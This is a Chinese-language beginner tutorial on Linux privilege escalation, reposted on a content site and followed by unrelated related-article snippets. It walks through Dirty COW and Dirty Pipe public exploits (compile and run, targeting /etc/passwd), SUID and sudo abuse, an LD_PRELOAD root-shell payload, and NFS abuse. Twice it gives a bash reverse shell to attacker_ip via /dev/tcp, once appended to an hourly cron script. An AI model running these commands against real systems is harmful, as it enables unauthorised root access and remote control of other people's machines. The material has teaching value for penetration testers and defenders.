小白Linux提权

 

1.脏牛提权

原因:

内存子系统处理写入复制时,发生内存条件竞争,任务执行顺序异常,可导致应用崩溃,进一步执行其他代码。get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。当我们向带有MAP_PRIVATE(映射_私有)标记的只读文件映射区域写数据时,会产生一个映射文件的复制(COW),对此区域的任何修改都不会写回原来的文件,如果上述的竞态条件发生,就能成功的写回原来的文件。

使用公开的POC进行利用

gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w

2.文件覆盖

攻击者可以通过此漏洞写入任意文件,包括权限提升。

  1. 创建一个管道。
  2. 用任意数据填充管道(在所有ring entries中设置PIPE_BUF_FLAG_CAN_MERGE标志)
  3. 将管道排空(在struct pipe_inode_info环上的所有struct pipe_buffer实例中保持该标志的设置)
  4. 将目标文件(用O_RDONLY打开)中的数据从目标偏移量之前拼接到管道中
  5. 向管道中写入任意数据;由于PIPE_BUF_FLAG_CAN_MERGE被设置,该数据将覆盖缓存的文件页,而不是创建一个新的匿名的struct pipe_buffer。

使用公开的POC进行利用

gcc -o dirtypipe dirtypipe.c
./dirtypipe /etc/passwd

3. SUID文件

检查系统中具有SUID位的文件,这些文件在执行时以文件所有者的权限运行

# 查找SUID文件
find / -perm -4000 2>/dev/null
# 如果找到有漏洞的SUID文件,可以尝试利用
/usr/bin/passwd

4.sudo配置错误

sudoers配置文件,看看是否有任何普通用户可以执行的高权限命令。

sudo -l
# 如果有可执行的命令,如无需密码运行某些命令,可以利用提权
sudo /bin/bash

5. 环境变量漏洞

程序会使用不安全的环境变量,攻击者可以利用这些环境变量提权。

# 利用LD_PRELOAD提权
echo 'int main(){setgid(0); setuid(0); system("/bin/bash");}' > /tmp/priv_esc.c
gcc -fPIC -shared -o /tmp/priv_esc.so /tmp/priv_esc.c -nostartfiles
sudo LD_PRELOAD=/tmp/priv_esc.so <vulnerable_program>

6.可写脚本

计划任务执行的脚本可被普通用户修改,攻击者可以插入恶意代码。

# 查找可写的计划任务脚本
find /etc/cron* -writable 2>/dev/null
# 编辑脚本插入恶意代码,如反弹shell
echo 'bash -i >& /dev/tcp/attacker_ip/attacker_port 0>&1' >> /etc/cron.hourly/backup.sh

7. NFS共享

如果NFS共享配置不安全,可以挂载共享目录并进行提权。

# 挂载NFS共享
mount -o rw,vers=2 <target_ip>:/shared /mnt
# 尝试在共享目录中写入或执行高权限文件

Web应用漏洞

利用Web应用的漏洞(如RCE、文件上传等)进行提权。

# 通过Web Shell进行提权
/bin/bash -i >& /dev/tcp/attacker_ip/attacker_port 0>&1

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/29083.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Windows 通过代理服务器调用 openai 的 api

1. 查看网络是否联通 通过代理访问一个 HTTPS 网站来验证代理服务器是否工作正常 curl -x socks5h://127.0.0.1:1080 https://www.google.com2. curl 访问openai的api curl -x socks5h://127.0.0.1:1080 -s https://api.openai.com/v1/models/gpt-3.5-turbo -H "Auth…

Java面试题:Redis分片集群结构

分片集群结构 Redis存在以下两个问题 海量数据的存储问题 高并发写的问题 分片集群特征 集群中有多个master,每个master保存不同数据 每个master都可以有多个slave节点 master之间通过ping监测彼此的健康状态 客户端请求可以访问集群的任意节点,最终会被转发到正确的节…

整理好了!2024年最常见 20 道设计模式面试题(二)

上一篇地址&#xff1a;整理好了&#xff01;2024年最常见 20 道设计模式面试题&#xff08;一&#xff09;-CSDN博客 三、解释工厂方法模式和抽象工厂模式的区别。 工厂方法模式和抽象工厂模式都是创建型设计模式&#xff0c;它们用于创建对象&#xff0c;但它们在应用场景和…

Avalonia for VSCode

1、在VSCode中编辑AvaloniaUI界面&#xff0c;在VSCode中搜索Avalonia&#xff0c;并安装。如下图&#xff0c;可以发现Avalonia for VSCode还是预览版。 2、 创建一个Avalonia 项目。 选择项目类型 输入项目名称 选择项目所在文件夹 打开项目 3、项目架构如下图。 4、builde…

WPF 布局控件 Grid表格

介绍 Grid表格布局控件&#xff0c;在WPF项目的界面布局中非常常用。主要是以行列进行元素控制的。 常用的属性 Grid.Row: 指定子元素所在的行。 Grid.Column: 指定子元素所在的列。 Grid.RowSpan 跨几行 Grid.ColumnSpan 跨几列 RowSpacing:…

敏捷测试:方法和实践

敏捷测试&#xff1a;方法和实践 前言1. 敏捷团队组织构成与任务2. 测试驱动开发&#xff08;TDD&#xff09;3. 递增型迭代测试模型4. 静态测试的重要性5. 测试计划与管理6. 敏捷测试活动时间表结论 前言 敏捷测试的实践是将敏捷开发原则和方法运用到测试过程中&#xff0c;以…

ICBINP - “I Can‘t Believe It‘s Not Photography“

ICBINP - “I Can’t Believe It’s Not Photography” 推荐设置&#xff1a; DPM 3M SDE Karras or DPM 2M Karras, 20-30 steps, 2.5-5 CFG (or use Dynamic Thresholding), happiest at 640x960 with a hires fix on top, but if you are happy to hunt through seeds to a…

汇聚荣拼多多运营策略是怎么样的?

拼多多作为中国领先的电商平台&#xff0c;其运营策略一直备受关注。拼多多的成功不仅在于其创新的“社交电商”模式&#xff0c;更在于其精细化的市场定位和高效的用户增长策略。本文将深入分析拼多多的运营策略&#xff0c;探讨其如何在激烈的电商竞争中突围而出。 一、用户增…

基于Java的度分秒坐标转纯经纬度坐标的漂亮国基地信息管理

目录 前言 一、空间表设计 1、物理表结构 二、后台数据管理 1、数据去重 2、去重的具体实现 3、度分秒数据格式转换 4、具体的转换方法 5、新增界面的实现 三、数据管理界面 总结 前言 众所周知&#xff0c;漂亮国在全球范围内部署了大量的基地&#xff0c;用以维持其…

Unity OpenCVForUnity 安装和第一个案例详解 <一>

目录 一、资源简介 二、安装使用 1.下载案例Demo 2.移动StreamingAssets文件夹 3.添加场景 三、今日案例 1.案例Texture2DToMat Example 2.什么是Mat&#xff1f; 3.如何把Texture2D变成Mat &#xff08;1&#xff09;.初始化Mat &#xff08;2&#xff09;.Cv_…

React如何配置路由

ReactTs配置路由 安装依赖 npm i react-router-dom在routers下面创建index.tsx import { RouteObject } from react-router-dom import React from react import PageA from /views/PageA import PageB from /views/PageB const routes: RouteObject[] [{path: /,element: …

Bagging与Boosting的应用与优势

Hi~&#xff01;这里是奋斗的小羊&#xff0c;很荣幸您能阅读我的文章&#xff0c;诚请评论指点&#xff0c;欢迎欢迎 ~~ &#x1f4a5;&#x1f4a5;个人主页&#xff1a;奋斗的小羊 &#x1f4a5;&#x1f4a5;所属专栏&#xff1a;C语言 &#x1f680;本系列文章为个人学习…

【最全面最优质的PyTorch学习资源】

纯 PyTorch 资源 PyTorch 博客 https://pytorch.org/blog/ PyTorch 文档 https://pytorch.org/docs PyTorch 性能调优指南 https://pytorch.org/tutorials/recipes/recipes/tuning_guide.html# PyTorch Recipes https://pytorch.org/tutorials/recipes/recipes_index.h…

项目管理进阶之EVM(挣值管理)

前言 项目管理进阶系列&#xff0c;终于有时间更新啦&#xff01;&#xff01;&#xff01;欢迎持续关注哦~ 上一节博主重点讲了一个环&#xff1a;PDCA&#xff0c;无论各行各业&#xff0c;上到航空航天、下到种地种菜&#xff0c;都离不开对质量的监督和改进。这个环既是一…

面试题:script标签中 defer(延迟)和 async(异步) 有啥区别?(他们只对外部脚本有效)

defer脚本即使下载完成&#xff0c;也会被延迟到整个页面都解析完毕后再运行&#xff0c;运行结束后触发DOMContentLoaded事件。” “而async脚本下载完成后立即执行&#xff0c;可能会在 DOMContentLoaded之前或之后&#xff0c;保证在页面的 load 事件前执行

MyBatis 关于查询语句上配置的详细内容

1. MyBatis 关于查询语句上配置的详细内容 文章目录 1. MyBatis 关于查询语句上配置的详细内容2. 准备工作3. SQL查询结果&#xff0c;返回为POJO实体类型4. SQL查询结果&#xff0c;返回为List<POJO\> 集合类型5. SQL查询结果&#xff0c;返回为Map 集合6. SQL查询结果&…

洗地机性价比高的是哪一款?行内人告诉你

在浏览前&#xff0c;希望您轻触屏幕上方的“关注”按钮&#xff0c;让我后续为您带来更多实用且精彩的内容&#xff0c;感谢您的支持&#xff01; 洗地机作为现在的流行清洁工具&#xff0c;它的魅力之处在于&#xff1a;性价比极高&#xff0c;大多数家庭无需花费过多就能把…

IPNV6写法

黄色---一致 红色---取消 V4中的第二列用于分片 V6可以使用扩展首部实现 蓝色--替代 1、服务类型--扩展表 2、报头长度---有效负载长度 3、TTL--跳数限制 4、协议号---下一个头…

英伟达开源 3400 亿参数模型;苹果 iOS 18 紧急 SOS 新增实时视频功能丨 RTE 开发者日报 Vol.225

开发者朋友们大家好&#xff1a; 这里是 「RTE 开发者日报」 &#xff0c;每天和大家一起看新闻、聊八卦。我们的社区编辑团队会整理分享 RTE&#xff08;Real-Time Engagement&#xff09; 领域内「有话题的新闻」、「有态度的观点」、「有意思的数据」、「有思考的文章」、「…

力扣172. 阶乘后的零

Problem: 172. 阶乘后的零 文章目录 题目描述思路及解法复杂度Code 题目描述 思路及解法 1.要使得末尾出现0&#xff0c;则乘式中必须出现因子2与5&#xff1b; 2.而由于对于一个数的阶乘&#xff0c;易知因子2的个数是大于因子5的个数&#xff08;因为只要出现偶数则可以分解出…